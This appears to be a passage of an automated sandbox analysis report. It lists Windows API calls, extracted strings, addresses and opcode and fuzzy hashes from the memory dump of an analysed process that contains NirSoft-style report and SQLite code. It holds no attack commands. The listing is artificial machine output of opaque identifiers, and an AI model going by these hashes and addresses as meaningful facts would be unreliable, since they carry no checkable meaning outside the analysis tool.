                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                  • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                  • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                  • String ID: \systemroot
                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                  • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                  • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy
                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                  • API String ID: 1284135714-318151290
                                                                                                                  • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                  • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                  • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                  • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 290601579-0
                                                                                                                  • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                  • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                  APIs
                                                                                                                  • memchr.MSVCRT ref: 00444EBF
                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                  • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                  • memset.MSVCRT ref: 0044505E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memchrmemset
                                                                                                                  • String ID: PD$PD
                                                                                                                  • API String ID: 1581201632-2312785699
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                  • GetParent.USER32(?), ref: 00409FA5
                                                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2163313125-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                  • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                  • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                  • String ID: ($d
                                                                                                                  • API String ID: 1140211610-1915259565
                                                                                                                  APIs
                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3015003838-0
                                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00407E44
                                                                                                                  • memset.MSVCRT ref: 00407E5B
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                  • wcscpy.MSVCRT ref: 00407F10
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 59245283-0
                                                                                                                  • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                  • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2802642348-0
                                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                  • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                  • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                  • memset.MSVCRT ref: 00413ADC
                                                                                                                  • memset.MSVCRT ref: 00413AEC
                                                                                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                  • memset.MSVCRT ref: 00413BD7
                                                                                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                  • String ID: 3A
                                                                                                                  • API String ID: 3300951397-293699754
                                                                                                                  • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                  • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                  • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                  • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
